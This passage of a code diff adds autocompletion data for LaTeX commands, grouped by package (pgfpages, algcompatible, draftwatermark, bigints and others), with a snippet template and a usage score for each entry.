0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'pgfpages-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfpages-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfpages-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfpages-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pgfpages-cmd', + score: 0.004649150613625593, + }, + { + caption: 
'\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfpages-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfpages-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfpages-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfpages-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'pgfpages-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfpages-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfpages-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'pgfpages-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'pgfpages-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'pgfpages-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'pgfpages-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'pgfpages-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfpages-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pgfpages-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'pgfpages-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfpages-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'pgfpages-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'pgfpages-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'pgfpages-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'pgfpages-cmd', + score: 0.2864294797053033, + }, + ], + ctex: [ + { + caption: '\\CTeX', + snippet: '\\CTeX', + meta: 'ctex-cmd', + score: 0.0005884706823906032, + }, + { + caption: '\\selectfont', + snippet: '\\selectfont', + meta: 'ctex-cmd', + score: 0.04598628699063736, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'ctex-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'ctex-cmd', + score: 0.2864294797053033, + }, + ], + algcompatible: [ + { + caption: '\\algrenewcommand', + snippet: '\\algrenewcommand', + meta: 'algcompatible-cmd', + score: 0.0019861803661869416, + }, + { + caption: '\\Statex', + snippet: '\\Statex', + meta: 'algcompatible-cmd', + score: 0.008622777195102994, + }, + { + caption: '\\BState{}', + snippet: '\\BState{$1}', + meta: 'algcompatible-cmd', + score: 0.0008685861525307122, + }, + { + caption: '\\BState', + snippet: '\\BState', + meta: 'algcompatible-cmd', + score: 0.0008685861525307122, + }, + { + caption: '\\algloopdefx{}[][]{}', + snippet: '\\algloopdefx{$1}[$2][$3]{$4}', + meta: 'algcompatible-cmd', 
+ score: 0.00025315185701145097, + }, + { + caption: '\\algnewcommand', + snippet: '\\algnewcommand', + meta: 'algcompatible-cmd', + score: 0.0030209395012065327, + }, + { + caption: '\\algnewcommand{}[]{}', + snippet: '\\algnewcommand{$1}[$2]{$3}', + meta: 'algcompatible-cmd', + score: 0.0030209395012065327, + }, + { + caption: '\\Comment{}', + snippet: '\\Comment{$1}', + meta: 'algcompatible-cmd', + score: 0.005178604573219454, + }, + { + caption: '\\algblockdefx{}{}[]', + snippet: '\\algblockdefx{$1}{$2}[$3]', + meta: 'algcompatible-cmd', + score: 0.00025315185701145097, + }, + { + caption: '\\algrenewtext{}{}', + snippet: '\\algrenewtext{$1}{$2}', + meta: 'algcompatible-cmd', + score: 0.0024415580558825975, + }, + { + caption: '\\algrenewtext{}[]{}', + snippet: '\\algrenewtext{$1}[$2]{$3}', + meta: 'algcompatible-cmd', + score: 0.0024415580558825975, + }, + { + caption: '\\algblock{}{}', + snippet: '\\algblock{$1}{$2}', + meta: 'algcompatible-cmd', + score: 0.0007916858220314837, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'algcompatible-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\algdef{}[]{}{}{}{}', + snippet: '\\algdef{$1}[$2]{$3}{$4}{$5}{$6}', + meta: 'algcompatible-cmd', + score: 0.0003102486920966127, + }, + { + caption: '\\algdef{}[]{}{}[]{}{}', + snippet: '\\algdef{$1}[$2]{$3}{$4}[$5]{$6}{$7}', + meta: 'algcompatible-cmd', + score: 0.0003102486920966127, + }, + { + caption: '\\algdef{}[]{}[]{}', + snippet: '\\algdef{$1}[$2]{$3}[$4]{$5}', + meta: 'algcompatible-cmd', + score: 0.0003102486920966127, + }, + { + caption: '\\algtext{}', + snippet: '\\algtext{$1}', + meta: 'algcompatible-cmd', + score: 0.0005463612015579842, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'algcompatible-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'algcompatible-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'algcompatible-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'algcompatible-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'algcompatible-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'algcompatible-cmd', + score: 0.0018957469739775527, + }, + ], + draftwatermark: [ + { + caption: '\\SetWatermarkScale{}', + snippet: '\\SetWatermarkScale{$1}', + meta: 'draftwatermark-cmd', + score: 0.0013776850432469145, + }, + { + caption: '\\SetWatermarkText{}', + snippet: '\\SetWatermarkText{$1}', + meta: 'draftwatermark-cmd', + score: 0.0017209596079747669, + }, + { + caption: '\\SetWatermarkColor[]{}', + snippet: '\\SetWatermarkColor[$1]{$2}', + meta: 'draftwatermark-cmd', + score: 0.0007061648188687239, + }, + { + caption: '\\SetWatermarkFontSize{}', + snippet: '\\SetWatermarkFontSize{$1}', + meta: 'draftwatermark-cmd', + score: 0.0005747853176838451, + }, + { + caption: '\\SetWatermarkLightness{}', + snippet: '\\SetWatermarkLightness{$1}', + meta: 'draftwatermark-cmd', + score: 0.0005747853176838451, + }, + { + caption: '\\SetWatermarkAngle{}', + snippet: '\\SetWatermarkAngle{$1}', + meta: 'draftwatermark-cmd', + score: 0.0005747853176838451, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'draftwatermark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\setkeys{}{}', + snippet: 
'\\setkeys{$1}{$2}', + meta: 'draftwatermark-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'draftwatermark-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'draftwatermark-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'draftwatermark-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'draftwatermark-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'draftwatermark-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'draftwatermark-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'draftwatermark-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'draftwatermark-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'draftwatermark-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'draftwatermark-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'draftwatermark-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'draftwatermark-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'draftwatermark-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'draftwatermark-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'draftwatermark-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'draftwatermark-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'draftwatermark-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'draftwatermark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'draftwatermark-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'draftwatermark-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'draftwatermark-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'draftwatermark-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'draftwatermark-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'draftwatermark-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'draftwatermark-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'draftwatermark-cmd', + score: 
0.004719094298848707, + }, + ], + eqparbox: [ + { + caption: '\\eqparbox{}{}', + snippet: '\\eqparbox{$1}{$2}', + meta: 'eqparbox-cmd', + score: 2.9423534119530166e-5, + }, + { + caption: '\\item', + snippet: '\\item ', + meta: 'eqparbox-cmd', + score: 3.800886892251021, + }, + { + caption: '\\item[]', + snippet: '\\item[$1] ', + meta: 'eqparbox-cmd', + score: 3.800886892251021, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'eqparbox-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'eqparbox-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'eqparbox-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'eqparbox-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'eqparbox-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'eqparbox-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'eqparbox-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'eqparbox-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'eqparbox-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'eqparbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'eqparbox-cmd', + score: 0.021170869458413965, + }, + ], + nowidow: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'nowidow-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'nowidow-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'nowidow-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'nowidow-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'nowidow-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'nowidow-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'nowidow-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'nowidow-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'nowidow-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'nowidow-cmd', + score: 0.021170869458413965, + }, + ], + stackrel: [ + { + caption: '\\stackrel{}{}', + snippet: '\\stackrel{$1}{$2}', + meta: 'stackrel-cmd', + score: 0.009911875742973681, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'stackrel-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'stackrel-cmd', + score: 0.002958865219480927, + }, + ], + threeparttablex: [ + { + caption: '\\item', + snippet: '\\item ', + meta: 'threeparttablex-cmd', + score: 3.800886892251021, + }, + { + caption: '\\item[]', + snippet: '\\item[$1] ', + meta: 'threeparttablex-cmd', + score: 3.800886892251021, + }, + { + caption: '\\insertTableNotes', + snippet: 
'\\insertTableNotes', + meta: 'threeparttablex-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\tnotex{}', + snippet: '\\tnotex{$1}', + meta: 'threeparttablex-cmd', + score: 0.0021491972748178554, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'threeparttablex-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'threeparttablex-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\item', + snippet: '\\item ', + meta: 'threeparttablex-cmd', + score: 3.800886892251021, + }, + { + caption: '\\item[]', + snippet: '\\item[$1] ', + meta: 'threeparttablex-cmd', + score: 3.800886892251021, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'threeparttablex-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'threeparttablex-cmd', + score: 0.021170869458413965, + }, + ], + mathdesign: [ + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'mathdesign-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'mathdesign-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'mathdesign-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'mathdesign-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'mathdesign-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'mathdesign-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'mathdesign-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'mathdesign-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'mathdesign-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'mathdesign-cmd', + score: 0.00037306820619479756, + }, + ], + 'pst-node': [ + { + caption: '\\green', + snippet: '\\green', + meta: 'pst-node-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\green{}', + snippet: '\\green{$1}', + meta: 'pst-node-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'pst-node-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'pst-node-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\gray', + snippet: '\\gray', + meta: 'pst-node-cmd', + score: 0.0005786730478266738, + }, + { + caption: '\\red{}', + snippet: '\\red{$1}', + meta: 'pst-node-cmd', + score: 0.006520475264573554, + }, + { + caption: '\\red', + snippet: '\\red', + meta: 'pst-node-cmd', + score: 0.006520475264573554, + }, + ], + varwidth: [ + { + caption: '\\par', + snippet: '\\par', + meta: 'varwidth-cmd', + score: 0.413853376001159, + }, + ], + schemabloc: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'schemabloc-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'schemabloc-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'schemabloc-cmd', + score: 0.021170869458413965, + }, + { + caption: 
'\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'schemabloc-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'schemabloc-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'schemabloc-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'schemabloc-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'schemabloc-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'schemabloc-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'schemabloc-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'schemabloc-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'schemabloc-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'schemabloc-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'schemabloc-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'schemabloc-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'schemabloc-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'schemabloc-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'schemabloc-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'schemabloc-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'schemabloc-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'schemabloc-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'schemabloc-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'schemabloc-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'schemabloc-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'schemabloc-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'schemabloc-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'schemabloc-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'schemabloc-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'schemabloc-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'schemabloc-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: 
'\\colorlet{$1}{$2}', + meta: 'schemabloc-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'schemabloc-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'schemabloc-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'schemabloc-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'schemabloc-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'schemabloc-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'schemabloc-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'schemabloc-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'schemabloc-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'schemabloc-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'schemabloc-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'schemabloc-cmd', + score: 0.2864294797053033, + }, + ], + bigints: [ + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'bigints-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'bigints-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'bigints-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'bigints-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'bigints-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'bigints-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'bigints-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'bigints-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'bigints-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'bigints-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'bigints-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'bigints-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'bigints-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'bigints-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'bigints-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'bigints-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'bigints-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'bigints-cmd', + score: 0.0054372322008878786, + }, + { + caption: 
'\\over', + snippet: '\\over', + meta: 'bigints-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'bigints-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'bigints-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'bigints-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'bigints-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'bigints-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'bigints-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'bigints-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'bigints-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'bigints-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'bigints-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'bigints-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'bigints-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'bigints-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'bigints-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'bigints-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'bigints-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'bigints-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'bigints-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'bigints-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'bigints-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'bigints-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: 